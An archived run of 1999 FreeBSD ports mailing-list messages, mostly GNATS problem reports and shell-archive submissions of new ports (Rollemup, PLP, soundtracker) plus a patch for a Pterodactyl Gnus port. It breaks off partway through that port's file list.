X-Loop: FreeBSD.org >Number: 15177 >Category: ports >Synopsis: not able to set CC in port, graphics/mpeg2codec >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 21:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: James Andariese >Release: 3.3 >Organization: >Environment: FreeBSD emr.itacs.to 3.3-STABLE FreeBSD 3.3-STABLE #0: Wed Nov 10 08:38:54 AKST 1999 root@emr.moo411.org:/usr/src/sys/compile/SUPERFRIEND i386 >Description: The port, mpeg2codec does not allow setting of CC and so, gcc295 is not used. Port build fails when CFLAGS has -mpentium in it unless gcc295 is used (egcs or other -mpentium using cc like pgcc). >How-To-Repeat: Build graphics/mpeg2codec with CC set to cc and CFLAGS set to -mpentium >Fix: This is uuencoded, uncompressed patchfile for ports/graphics/mpeg2codec. begin 644 mpeg2codec.diff M9&EF9B`M=7).(&UP96Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 23: 0:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8AEB41583B for ; Mon, 29 Nov 1999 23:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA98412; Mon, 29 Nov 1999 23:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from titanium.yy.ics.keio.ac.jp (titanium.yy.ics.keio.ac.jp [131.113.47.73]) by hub.freebsd.org (Postfix) with ESMTP id E6C7E157B0 for ; Mon, 29 Nov 1999 22:57:08 -0800 (PST) (envelope-from sanpei@sanpei.org) Received: from lavender.yy.cs.keio.ac.jp (lavender.yy.ics.keio.ac.jp [131.113.47.22]) by titanium.yy.ics.keio.ac.jp (8.9.3+3.2W/3.7W) with ESMTP id PAA10474; Tue, 30 Nov 1999 15:57:01 +0900 (JST) (envelope-from sanpei@sanpei.org) Received: (from sanpei@localhost) by lavender.yy.cs.keio.ac.jp (8.9.3/3.7W) id PAA23060; Tue, 30 Nov 1999 15:57:01 +0900 (JST) Message-Id: <199911300657.PAA23060@lavender.yy.cs.keio.ac.jp> Date: Tue, 30 Nov 1999 15:57:01 +0900 (JST) From: sanpei@sanpei.org Reply-To: sanpei@sanpei.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15178: new port: games/rollemup (pinball game) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15178 >Category: ports >Synopsis: new port: games/rollemup (pinball game) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 23:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: MIHIRA Yoshiro >Release: FreeBSD 4.0-CURRENT i386 >Organization: Keio univ. >Environment: FreeBSD sanpei.cc.keio.ac.jp 4.0-CURRENT FreeBSD 4.0-CURRENT #4: Sun Nov 28 21:38:15 JST 1999 sanpei@sanpei.cc.keio.ac.jp:/usr/src/sys/compile/SANPEI i386 >Description: Hi. I ported Rollemup, cool pinball game. This port was ported from NetBSD/pkgsrc/games/rollemup. Thank you. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # rollemup/Makefile # rollemup/files # rollemup/pkg # rollemup/files/MESSAGE # rollemup/files/README.Rollemup # rollemup/files/md5 # rollemup/files/rollemup.sh # rollemup/pkg/COMMENT # rollemup/pkg/DESCR # rollemup/pkg/PLIST # echo x - rollemup/Makefile sed 's/^X//' >rollemup/Makefile << 'END-of-rollemup/Makefile' X# New ports collection makefile for: Rollemup X# Version required: 1.0 X# Date created: 22 October 1999 X# Whom: Kazuki Sakamoto X# X# $FreeBSD$ X# $NetBSD: Makefile,v 1.4 1999/11/23 16:54:40 hubertf Exp $ X# X XDISTNAME= Rollemup XPKGNAME= rollemup-1.0 XCATEGORIES= games XMASTER_SITES= ftp://usa.lostboys.nl/pub/medialab/rollemup/Linux/ X XMAINTAINER= sanpei@jp.FreeBSD.org X XRUN_DEPENDS= /compat/linux/usr/i486-linux-libc5/lib/libc.so.5:${PORTSDIR}/emulators/linux_base X XLICENSE= no-commercial-use XRESTRICTED= You are not allowed to distribute the software by any means. \ X You are allowed to download a copy from this site for personal use. \ X See http://www.medialab.lostboys.nl/content/showcase/license.html X XONLY_FOR_ARCHS= i386 X XEXTRACT_ONLY= # empty XNO_PACKAGE= ${RESTRICTED} XNO_CDROM= ${RESTRICTED} X XPLIST= ${WRKDIR}/PLIST XPLIST_SRC= ${PLIST} XPKGMESSAGE= ${WRKDIR}/MESSAGE XGAMES_DIR= lib X Xdo-build: X @${SED} -e 's|$${PREFIX}|${PREFIX}|g' -e 's|$${GAMES_DIR}|${GAMES_DIR}|g' ${FILESDIR}/rollemup.sh \ X > ${WRKDIR}/rollemup X @${SED} -e 's|$${PREFIX}|${PREFIX}|g' -e 's|$${GAMES_DIR}|${GAMES_DIR}|g' ${FILESDIR}/MESSAGE \ X > ${PKGMESSAGE} X @${SED} -e 's|$${PREFIX}|${PREFIX}|g' ${FILESDIR}/README.Rollemup \ X > ${WRKDIR}/README.Rollemup X Xdo-install: X @${MKDIR} ${PREFIX}/${GAMES_DIR} X @${TAR} xCzf ${PREFIX}/${GAMES_DIR} ${_DISTDIR}/${DISTFILES} X @${TOUCH} ${PREFIX}/${GAMES_DIR}/Rollemup/Rollemup.ini X @${MV} ${PREFIX}/${GAMES_DIR}/Rollemup/Rollemup ${PREFIX}/bin X @${INSTALL_SCRIPT} ${WRKDIR}/rollemup ${PREFIX}/bin X @${INSTALL_DATA} ${WRKDIR}/README.Rollemup \ X ${PREFIX}/${GAMES_DIR}/Rollemup X @${CP} ${PKGDIR}/PLIST ${PLIST_SRC} X @(cd ${PREFIX}; \ X find ${GAMES_DIR}/Rollemup -type f >> ${PLIST_SRC}; \ X for DIR in `find ${GAMES_DIR}/Rollemup -type d | sort -r`; do \ X ${ECHO} "@dirrm $$DIR" >> ${PLIST_SRC}; \ X done) X @${CHOWN} root:games ${PREFIX}/bin/Rollemup X @${CHMOD} 2755 ${PREFIX}/bin/Rollemup X @${CHOWN} -R root:games ${PREFIX}/${GAMES_DIR}/Rollemup X @${CHMOD} 775 ${PREFIX}/${GAMES_DIR}/Rollemup/Games X @${CHMOD} 775 ${PREFIX}/${GAMES_DIR}/Rollemup/Upload X @${CHMOD} 664 ${PREFIX}/${GAMES_DIR}/Rollemup/Rollemup.ini X Xpost-install: X @${CAT} ${PKGMESSAGE} X X.include END-of-rollemup/Makefile echo c - rollemup/files mkdir -p rollemup/files > /dev/null 2>&1 echo c - rollemup/pkg mkdir -p rollemup/pkg > /dev/null 2>&1 echo x - rollemup/files/MESSAGE sed 's/^X//' >rollemup/files/MESSAGE << 'END-of-rollemup/files/MESSAGE' XPlease read ${PREFIX}/${GAMES_DIR}/Rollemup/README.Rollemup END-of-rollemup/files/MESSAGE echo x - rollemup/files/README.Rollemup sed 's/^X//' >rollemup/files/README.Rollemup << 'END-of-rollemup/files/README.Rollemup' XLicense information: X http://www.medialab.lostboys.nl/content/showcase/license.html X XHow to start: X exec ${PREFIX}/bin/rollemup X XControls: X '/' for the Right Flipper X 'Z' for the Left Flipper X 'Enter' for the Plunger X 'Space' for a Shake X 'N' for a New Game X 'P' to pause a Game X 'Q' to Quit X 'ESC' to abort the game END-of-rollemup/files/README.Rollemup echo x - rollemup/files/md5 sed 's/^X//' >rollemup/files/md5 << 'END-of-rollemup/files/md5' X$NetBSD: md5,v 1.3 1999/10/28 06:59:14 sakamoto Exp $ X XMD5 (Rollemup.tar.gz) = 00844bfc54a941f96f26213c9a16442a END-of-rollemup/files/md5 echo x - rollemup/files/rollemup.sh sed 's/^X//' >rollemup/files/rollemup.sh << 'END-of-rollemup/files/rollemup.sh' X#!/bin/sh X(cd ${PREFIX}/${GAMES_DIR}/Rollemup; ${PREFIX}/bin/Rollemup) END-of-rollemup/files/rollemup.sh echo x - rollemup/pkg/COMMENT sed 's/^X//' >rollemup/pkg/COMMENT << 'END-of-rollemup/pkg/COMMENT' XMulti Ball, Player, Platform, Media, Cool Pinball game END-of-rollemup/pkg/COMMENT echo x - rollemup/pkg/DESCR sed 's/^X//' >rollemup/pkg/DESCR << 'END-of-rollemup/pkg/DESCR' XRoll 'm Up:Multi Ball, Multi Player, Multi Platform, Multi Media, Multi Cool X XThis package contains a Linux-x86 version of the Lost Boys pinball game XRollemUp , it is based on our cross-platform framework Lost Platform, Xnow running on MS Windows, Macintosh, BeOS and linux. XTested with XFree86 in different display depths, OSS sound on an SB16. XFor more information on this version, as well as the upcoming LinuxPPC Xversion check our site: X XWWW: www.medialab.lostboys.nl/rollemup/ X XLost Boys media lab X--- XKnown Problem X With pcm sound driver, sound is delayed about 10 seconds. X Please use with sys/i386/isa/snd(Voxware sound driver) X or OSS/FreeBSD sound driver, if you want to play with sound. X X This problem is not related to Linux Emulator. X XMIHIRA Yoshiro END-of-rollemup/pkg/DESCR echo x - rollemup/pkg/PLIST sed 's/^X//' >rollemup/pkg/PLIST << 'END-of-rollemup/pkg/PLIST' X@comment $NetBSD: PLIST,v 1.3 1999/10/28 06:59:15 sakamoto Exp $ Xbin/Rollemup Xbin/rollemup END-of-rollemup/pkg/PLIST exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 0:20: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 79BB714D6D for ; Tue, 30 Nov 1999 00:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA05617; Tue, 30 Nov 1999 00:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from lotl.clari.net.au (lotl.clari.net.au [203.26.127.210]) by hub.freebsd.org (Postfix) with ESMTP id 1A07B14D56 for ; Tue, 30 Nov 1999 00:13:40 -0800 (PST) (envelope-from maurice@atum.castro.aus.net) Received: (from uucp@localhost) by lotl.clari.net.au (8.9.3/8.9.1) with UUCP id TAA06802 for FreeBSD-gnats-submit@freebsd.org; Tue, 30 Nov 1999 19:13:39 +1100 (EST) (envelope-from maurice@atum.castro.aus.net) Received: from atum.castro.aus.net (atum.castro.aus.net [203.8.14.82]) by horus.castro.aus.net (8.8.5/8.8.5) with ESMTP id SAA02049 for ; Tue, 30 Nov 1999 18:20:31 +1100 (EST) Received: (from root@localhost) by atum.castro.aus.net (8.9.3/8.9.3) id SAA21838; Tue, 30 Nov 1999 18:19:28 +1100 (EST) (envelope-from maurice) Message-Id: <199911300719.SAA21838@atum.castro.aus.net> Date: Tue, 30 Nov 1999 18:19:28 +1100 (EST) From: Maurice Castro Reply-To: maurice@atum.castro.aus.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15179: New Port - comms package for Psion palm top Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15179 >Category: ports >Synopsis: New Port - comms package for Psion palm top >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 00:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Maurice Castro >Release: FreeBSD 3.2-RELEASE i386 >Organization: Software Engineering Research Centre >Environment: All >Description: Port of PLP package to FreeBSD. >How-To-Repeat: Code included. Catagory comms selected because of lack of better option. Suggest new catagory psion to complement palm catagory. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # plp # plp/Makefile # plp/files # plp/files/md5 # plp/patches # plp/patches/patch-aa # plp/patches/patch-ab # plp/pkg # plp/pkg/PLIST # plp/pkg/DESCR # plp/pkg/COMMENT # echo c - plp mkdir -p plp > /dev/null 2>&1 echo x - plp/Makefile sed 's/^X//' >plp/Makefile << 'END-of-plp/Makefile' X# New ports collection makefile for: Psion Link Protocol X# Version required: 1.8 X# Date created: Tue Nov 30 15:43:27 EST 1999 X# Whom: Maurice Castro X# X# $Id$ X# X XDISTNAME= plp_1_8 XPKGNAME= plp-1.8 XCATEGORIES= comms XMASTER_SITES= http://www.proudman51.freeserve.co.uk/psion/ X XMAINTAINER= maurice@serc.rmit.edu.au X XUSE_GMAKE= yes X Xdo-install: X ${INSTALL_PROGRAM} ${WRKSRC}/bin/ncp ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/bin/rfsv ${PREFIX}/bin X X.include END-of-plp/Makefile echo c - plp/files mkdir -p plp/files > /dev/null 2>&1 echo x - plp/files/md5 sed 's/^X//' >plp/files/md5 << 'END-of-plp/files/md5' XMD5 (plp_1_8.tar.gz) = 63c0871eb0504c69677c8e16f2d43ea2 END-of-plp/files/md5 echo c - plp/patches mkdir -p plp/patches > /dev/null 2>&1 echo x - plp/patches/patch-aa sed 's/^X//' >plp/patches/patch-aa << 'END-of-plp/patches/patch-aa' X*** ncp/mp_serial.c.dist Tue Nov 30 17:36:34 1999 X--- ncp/mp_serial.c Tue Nov 30 17:37:10 1999 X*************** X*** 223,229 **** X void ser_exit(int fd) X { X struct termios ti; X! if(ioctl(fd, TCGETS, (caddr_t)&ti) < 0) { X perror("TCGETSW"); X } X ti.c_cflag &= ~CRTSCTS; X--- 223,229 ---- X void ser_exit(int fd) X { X struct termios ti; X! if(tcgetattr(fd, &ti) < 0) { X perror("TCGETSW"); X } X ti.c_cflag &= ~CRTSCTS; END-of-plp/patches/patch-aa echo x - plp/patches/patch-ab sed 's/^X//' >plp/patches/patch-ab << 'END-of-plp/patches/patch-ab' X*** defaults.h.dist Tue Nov 30 17:39:40 1999 X--- defaults.h Tue Nov 30 17:40:09 1999 X*************** X*** 19,25 **** X X // This is the default device driver for the serial link X // N.B. This was "/dev/cua1" in the previous release X! #define DEFAULT_SERIAL_DEVICE "/dev/ttyS1" X X // This is the default drive to use on the psion X #define DEFAULT_DRIVE "C:\\" X--- 19,25 ---- X X // This is the default device driver for the serial link X // N.B. This was "/dev/cua1" in the previous release X! #define DEFAULT_SERIAL_DEVICE "/dev/cuaa1" X X // This is the default drive to use on the psion X #define DEFAULT_DRIVE "C:\\" END-of-plp/patches/patch-ab echo c - plp/pkg mkdir -p plp/pkg > /dev/null 2>&1 echo x - plp/pkg/PLIST sed 's/^X//' >plp/pkg/PLIST << 'END-of-plp/pkg/PLIST' Xbin/ncp Xbin/rfsv END-of-plp/pkg/PLIST echo x - plp/pkg/DESCR sed 's/^X//' >plp/pkg/DESCR << 'END-of-plp/pkg/DESCR' XPLP implements the Psion Link Protocol. This program is used to Xtransfer data between a Psion Series 5mx (default) or Psion Series X5 to a Unix server. The port is set up by default to use port cuaa1 Xto connect to the palm top. The ncp daemon is started to communicate Xwith the Psion and an ftp like interface is provided by rfsv. END-of-plp/pkg/DESCR echo x - plp/pkg/COMMENT sed 's/^X//' >plp/pkg/COMMENT << 'END-of-plp/pkg/COMMENT' XTransfer data between a Psion Series 5(mx) and Unix. END-of-plp/pkg/COMMENT exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 0:43:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E580214C8F; Tue, 30 Nov 1999 00:43:40 -0800 (PST) (envelope-from taoka@FreeBSD.org) Received: (from taoka@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA08093; Tue, 30 Nov 1999 00:43:40 -0800 (PST) (envelope-from taoka@FreeBSD.org) Date: Tue, 30 Nov 1999 00:43:40 -0800 (PST) From: Message-Id: <199911300843.AAA08093@freefall.freebsd.org> To: kiri@pis.toba-cmt.ac.jp, taoka@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15163: Update ports: xemacs-mule-packages-1.0(editors/xemacs-mule-packages) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update ports: xemacs-mule-packages-1.0(editors/xemacs-mule-packages) State-Changed-From-To: open->closed State-Changed-By: taoka State-Changed-When: Tue Nov 30 00:39:30 PST 1999 State-Changed-Why: Commited, thanks!! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 0:50: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5FC1B14D44 for ; Tue, 30 Nov 1999 00:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA08772; Tue, 30 Nov 1999 00:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from emerald.oz.net (emerald.oz.net [216.39.128.2]) by hub.freebsd.org (Postfix) with ESMTP id 159B414C8F for ; Tue, 30 Nov 1999 00:45:04 -0800 (PST) (envelope-from kzentner@u.washington.edu) Received: from sense-sea-MegaSub-1-723.oz.net (sense-sea-MegaSub-1-723.oz.net [216.39.146.215]) by emerald.oz.net (8.9.3/8.7.3) with ESMTP id AAA03623 for ; Tue, 30 Nov 1999 00:36:10 -0800 (PST) Message-Id: Date: Tue, 30 Nov 1999 00:45:02 -0800 (PST) From: Kristopher Zentner To: FreeBSD-gnats-submit@freebsd.org Subject: ports/15180: New audio port submission: soundtracker (fwd) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15180 >Category: ports >Synopsis: New audio port submission: soundtracker >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 00:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kristopher Zentner >Release: FreeBSD 3.3-STABLE i386 >Organization: none >Environment: This is my submission for an audio port "soundtracker", a MOD tracking program >Description: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # soundtracker # soundtracker/files # soundtracker/files/md5 # soundtracker/Makefile # soundtracker/pkg # soundtracker/pkg/DESCR # soundtracker/pkg/PLIST # soundtracker/pkg/COMMENT # soundtracker/patches # soundtracker/patches/patch-aa # soundtracker/patches/patch-ab # soundtracker/patches/patch-ac # soundtracker/patches/patch-ad # soundtracker/patches/patch-ae # echo c - soundtracker mkdir -p soundtracker > /dev/null 2>&1 echo c - soundtracker/files mkdir -p soundtracker/files > /dev/null 2>&1 echo x - soundtracker/files/md5 sed 's/^X//' >soundtracker/files/md5 << 'END-of-soundtracker/files/md5' XMD5 (soundtracker-0.3.6.tar.gz) = 66ae56a5c6163105e72f58152a88417d END-of-soundtracker/files/md5 echo x - soundtracker/Makefile sed 's/^X//' >soundtracker/Makefile << 'END-of-soundtracker/Makefile' X# New ports collection makefile for: soundtracker X# Version required: 0.3.6 X# Date created: 28 November 1999 X# Whom: kzentner X# X# X XDISTNAME= soundtracker-0.3.6 XCATEGORIES= audio XMASTER_SITES= ftp://ftp.soundtracker.org/pub/soundtracker/v0.3/ X XMAINTAINER= kzentner@u.washington.edu X XLIB_DEPENDS= gtk12.2:${PORTSDIR}/x11-toolkits/gtk12 XGTK_CONFIG?= ${X11BASE}/bin/gtk12-config XGNU_CONFIGURE= YES X XCONFIGURE_ENV= GTK_CONFIG="${GTK_CONFIG}" X X.if defined(USE_GNOME) XCONFIGURE_ARGS+= --enable-gnome X.endif X Xpost-install: X @strip ${PREFIX}/bin/soundtracker X X.include END-of-soundtracker/Makefile echo c - soundtracker/pkg mkdir -p soundtracker/pkg > /dev/null 2>&1 echo x - soundtracker/pkg/DESCR sed 's/^X//' >soundtracker/pkg/DESCR << 'END-of-soundtracker/pkg/DESCR' XSoundtracker is a gtk based module tracker and editor for X written by XMichael Krause. It currently supports XM and MOD formats only and it Xallows you to save your files to XM or WAV format. Soundtracker supports XI Xinstruments and WAV samples. X XWWW: http://www.soundtracker.org X X- Kristopher Xkzentner@u.washington.edu END-of-soundtracker/pkg/DESCR echo x - soundtracker/pkg/PLIST sed 's/^X//' >soundtracker/pkg/PLIST << 'END-of-soundtracker/pkg/PLIST' Xbin/soundtracker Xshare/locale/de/LC_MESSAGES/soundtracker.mo END-of-soundtracker/pkg/PLIST echo x - soundtracker/pkg/COMMENT sed 's/^X//' >soundtracker/pkg/COMMENT << 'END-of-soundtracker/pkg/COMMENT' XMod player/tracking tool which supports XM and MOD formats. END-of-soundtracker/pkg/COMMENT echo c - soundtracker/patches mkdir -p soundtracker/patches > /dev/null 2>&1 echo x - soundtracker/patches/patch-aa sed 's/^X//' >soundtracker/patches/patch-aa << 'END-of-soundtracker/patches/patch-aa' X--- app/drivers/oss-input.c.orig Sun Nov 28 20:02:10 1999 X+++ app/drivers/oss-input.c Sun Nov 28 20:03:03 1999 X@@ -33,6 +33,6 @@ X #include X #include X-#include X+#include X #include X X #include END-of-soundtracker/patches/patch-aa echo x - soundtracker/patches/patch-ab sed 's/^X//' >soundtracker/patches/patch-ab << 'END-of-soundtracker/patches/patch-ab' X--- app/drivers/oss-output.c.orig Sun Nov 28 20:04:30 1999 X+++ app/drivers/oss-output.c Sun Nov 28 20:04:01 1999 X@@ -33,6 +33,6 @@ X #include X #include X-#include X+#include X #include X X #include END-of-soundtracker/patches/patch-ab echo x - soundtracker/patches/patch-ac sed 's/^X//' >soundtracker/patches/patch-ac << 'END-of-soundtracker/patches/patch-ac' X--- app/sample-editor.c.orig Sun Nov 28 20:05:23 1999 X+++ app/sample-editor.c Sun Nov 28 20:04:51 1999 X@@ -28,4 +28,4 @@ X #include X #include X-#include X+#include X #include END-of-soundtracker/patches/patch-ac echo x - soundtracker/patches/patch-ad sed 's/^X//' >soundtracker/patches/patch-ad << 'END-of-soundtracker/patches/patch-ad' X--- app/Makefile.in.orig Mon Nov 29 01:49:07 1999 X+++ app/Makefile.in Mon Nov 29 01:49:59 1999 X@@ -466,3 +466,3 @@ X install-exec-local: X- chown root.root $(bindir)/soundtracker X+ chown root.wheel $(bindir)/soundtracker X chmod +s $(bindir)/soundtracker END-of-soundtracker/patches/patch-ad echo x - soundtracker/patches/patch-ae sed 's/^X//' >soundtracker/patches/patch-ae << 'END-of-soundtracker/patches/patch-ae' X--- app/Makefile.am.orig Mon Nov 29 01:49:43 1999 X+++ app/Makefile.am Mon Nov 29 01:49:53 1999 X@@ -42,3 +42,3 @@ X install-exec-local: X- chown root.root $(bindir)/soundtracker X+ chown root.wheel $(bindir)/soundtracker X chmod +s $(bindir)/soundtracker END-of-soundtracker/patches/patch-ae exit >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 2: 3:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D0ABE15833 for ; Tue, 30 Nov 1999 02:03:20 -0800 (PST) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA98634; Tue, 30 Nov 1999 11:03:19 +0100 (CET) (envelope-from des) To: ports@freebsd.org Subject: pgnus-0.98 From: Dag-Erling Smorgrav Date: 30 Nov 1999 11:03:18 +0100 Message-ID: Lines: 9 User-Agent: Gnus/5.070097 (Pterodactyl Gnus v0.97) Emacs/20.4 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=-=-=" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --=-=-= Attached are patches for a port of Pterodactyl Gnus 0.98. Any comments before I import it? DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no --=-=-= Content-Disposition: attachment; filename=pgnus.diff Content-Description: port of Pterodactyl Gnus 0.98 Index: Makefile =================================================================== RCS file: /home/ncvs/ports/mail/Makefile,v retrieving revision 1.107 diff -u -r1.107 Makefile --- Makefile 1999/11/01 03:27:45 1.107 +++ Makefile 1999/11/30 09:59:41 @@ -59,6 +59,7 @@ SUBDIR += p5-Mail-POP3Client SUBDIR += p5-Mail-Tools SUBDIR += pathalias + SUBDIR += pgnus SUBDIR += pgpsendmail SUBDIR += pine3 SUBDIR += pine4 Index: pgnus/Makefile =================================================================== RCS file: Makefile diff -N Makefile --- /dev/null Tue Nov 30 02:20:14 1999 +++ Makefile Tue Nov 9 10:43:38 1999 @@ -0,0 +1,11 @@ +# $FreeBSD$ + +DISTNAME= pgnus-0.98 +CATEGORIES= mail +MASTER_SITES= ftp://ftp.ofug.org/pub/gnus/ +MAINTAINER= des@freebsd.org +RUN_DEPENDS= emacs-20.4:${PORTSDIR}/editors/emacs20 +WRKSRC= ${WRKDIR}/${PKGNAME} +GNU_CONFIGURE= yes + +.include Index: pgnus/files/md5 =================================================================== RCS file: md5 diff -N md5 --- /dev/null Tue Nov 30 02:20:14 1999 +++ md5 Tue Nov 9 10:44:31 1999 @@ -0,0 +1 @@ +MD5 (pgnus-0.98.tar.gz) = d24172db046a86cb680d95cf1ff7405c Index: pgnus/pkg/COMMENT =================================================================== RCS file: COMMENT diff -N COMMENT --- /dev/null Tue Nov 30 02:20:14 1999 +++ COMMENT Tue Nov 9 10:59:06 1999 @@ -0,0 +1 @@ +Powerful and flexible mail and news reader for Emacs 20. Index: pgnus/pkg/DESCR =================================================================== RCS file: DESCR diff -N DESCR --- /dev/null Tue Nov 30 02:20:14 1999 +++ DESCR Tue Nov 9 10:58:51 1999 @@ -0,0 +1,2 @@ +This is Pterodactyl Gnus 0.98, a powerful and flexible mail and news reader +for Emacs 20. See http://quimby.gnus.org/gnus/ for more information. Index: pgnus/pkg/PLIST =================================================================== RCS file: PLIST diff -N PLIST --- /dev/null Tue Nov 30 02:20:14 1999 +++ PLIST Tue Nov 9 10:57:54 1999 @@ -0,0 +1,115 @@ +info/emacs-mime +info/gnus +info/gnus-1 +info/gnus-10 +info/gnus-11 +info/gnus-12 +info/gnus-13 +info/gnus-14 +info/gnus-15 +info/gnus-16 +info/gnus-17 +info/gnus-2 +info/gnus-3 +info/gnus-4 +info/gnus-5 +info/gnus-6 +info/gnus-7 +info/gnus-8 +info/gnus-9 +info/message +share/emacs/site-lisp/base64.elc +share/emacs/site-lisp/binhex.elc +share/emacs/site-lisp/drums.elc +share/emacs/site-lisp/earcon.elc +share/emacs/site-lisp/format-spec.elc +share/emacs/site-lisp/gnus-agent.elc +share/emacs/site-lisp/gnus-art.elc +share/emacs/site-lisp/gnus-async.elc +share/emacs/site-lisp/gnus-audio.elc +share/emacs/site-lisp/gnus-bcklg.elc +share/emacs/site-lisp/gnus-cache.elc +share/emacs/site-lisp/gnus-cite.elc +share/emacs/site-lisp/gnus-cus.elc +share/emacs/site-lisp/gnus-demon.elc +share/emacs/site-lisp/gnus-draft.elc +share/emacs/site-lisp/gnus-dup.elc +share/emacs/site-lisp/gnus-eform.elc +share/emacs/site-lisp/gnus-ems.elc +share/emacs/site-lisp/gnus-gl.elc +share/emacs/site-lisp/gnus-group.elc +share/emacs/site-lisp/gnus-int.elc +share/emacs/site-lisp/gnus-kill.elc +share/emacs/site-lisp/gnus-load.elc +share/emacs/site-lisp/gnus-logic.elc +share/emacs/site-lisp/gnus-mh.elc +share/emacs/site-lisp/gnus-mlspl.elc +share/emacs/site-lisp/gnus-move.elc +share/emacs/site-lisp/gnus-msg.elc +share/emacs/site-lisp/gnus-nocem.elc +share/emacs/site-lisp/gnus-range.elc +share/emacs/site-lisp/gnus-salt.elc +share/emacs/site-lisp/gnus-score.elc +share/emacs/site-lisp/gnus-setup.elc +share/emacs/site-lisp/gnus-soup.elc +share/emacs/site-lisp/gnus-spec.elc +share/emacs/site-lisp/gnus-srvr.elc +share/emacs/site-lisp/gnus-start.elc +share/emacs/site-lisp/gnus-sum.elc +share/emacs/site-lisp/gnus-topic.elc +share/emacs/site-lisp/gnus-undo.elc +share/emacs/site-lisp/gnus-util.elc +share/emacs/site-lisp/gnus-uu.elc +share/emacs/site-lisp/gnus-vm.elc +share/emacs/site-lisp/gnus-win.elc +share/emacs/site-lisp/gnus.elc +share/emacs/site-lisp/ietf-drums.elc +share/emacs/site-lisp/imap.elc +share/emacs/site-lisp/lpath.elc +share/emacs/site-lisp/mail-parse.elc +share/emacs/site-lisp/mail-prsvr.elc +share/emacs/site-lisp/mail-source.elc +share/emacs/site-lisp/mailcap.elc +share/emacs/site-lisp/mailheader.elc +share/emacs/site-lisp/md5.elc +share/emacs/site-lisp/message.elc +share/emacs/site-lisp/messcompat.elc 